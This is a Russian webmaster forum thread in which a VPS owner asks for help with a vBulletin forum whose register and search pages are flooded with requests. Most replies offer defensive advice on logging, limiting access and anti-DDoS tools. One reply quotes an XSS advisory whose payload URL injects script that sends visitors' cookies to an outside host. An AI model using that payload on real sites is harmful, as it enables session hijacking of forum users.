- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева

Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ребята, прошу помощи :(
Арендую VPS. Сегодня ночью на нем легли все сайты.
Ошибка - 500.
Сразу начал стучать хостеру, мол в чём дело.
Получил ответ, что проблема с некоторым сайтом sait.ru
Это форум на Vbulletin 3.8
Проблема заключается в следующем, цитирую:
http://www.site/forum/register.php
http://www.site.ru/forum/search.php?do=process
Из-за этого лог файл очень быстро переполняется и занимает все свободное дисковое пространство(12G) Мы сейчас отключили этот домен, работа остальных сайтов восстановлена.
В общем, отключили этот проблемный домен и "спросили", не производил ли я каких либо изменений с этим доменом.
Изменений конечно не производилось. Посещалка осталась на прежнем уровне. Трафика вообще копейки, что то около 300 в сутки.
Переписку с хостером я отложил до утра, утром попросил "включить" домен, мол не работает всю ночь.
На что получил ответ, что сайт включали, проблема возобновилась. И они провели анализ домена и предполагают, что он возможно был скомпрометирован и мне необходимо посмотреть файлы на предмет даты последнего изменения и их размеры.
Посмотрел, ничего сверхъестественного и подозрительного пока не обнаружил. Копаюсь.
В логе такие ошибки:
И так повторяются до бесконечности.
В этом ничерта не понимаю, но видно что с разных ip "долбят" форум, а именно регистрацию и поиск.
Посоветуйте пожалуйста, что делать? Это DDos? Или может сломали что то?
Хостер тоже, "отрубил" сайт и как то никакой активности по этому вопросу не проявляет. Я даже не знаю, что спросить или потребовать. Да и вообще, должен ли.
эм.. ну отключить лог в nignx-е :)
Можно временно закрыть их (регистрацию и поиск).. если без них поднимется - дальше смотреть..
От мелких масштабов могут защитить "стандартные" средства (вроде такого)
Можно оставить поиск только для зарегистрированных (можно допилить и отсекать на уровне nginx-а), URL-ы поиска и регистрации сменить (? если в спам-базу попал, может и помочь)
взято с форума античат
3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
www.сom/forumpath/search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
в гугле много вариантов, отключи поиск и регистрацию, ищи заплатку...
Отключили запись логов. Пока помогает )
По статистике форума, вчера было одновременное пребывание 11,876 "человек". Которые регистрировались и использовали поиск.
Отключение поиска, регистрации ничего не дает. Тоже самое. Отключил форум, всё равно обращения идут.
Но интересно, почему их счетчики не видят. Как будто бы их нет.
kgtu5, спасибо, поищу. Хоть у меня и не 3.0, а 3.8
А куда копать вообще?
Но интересно, почему их счетчики не видят. Как будто бы их нет.
счётчики (вроде Liveinternet, метрики итд) используют javascript, а обращения, скорее всего, генерируются программами-спамилками, которые не исполняют JS, (либо выборочно, например, только с конкретного домена)
да ДДОС это, точнее HTTP flood
в легких случаях помогает эта штука
http://klavasoft.com/antiddos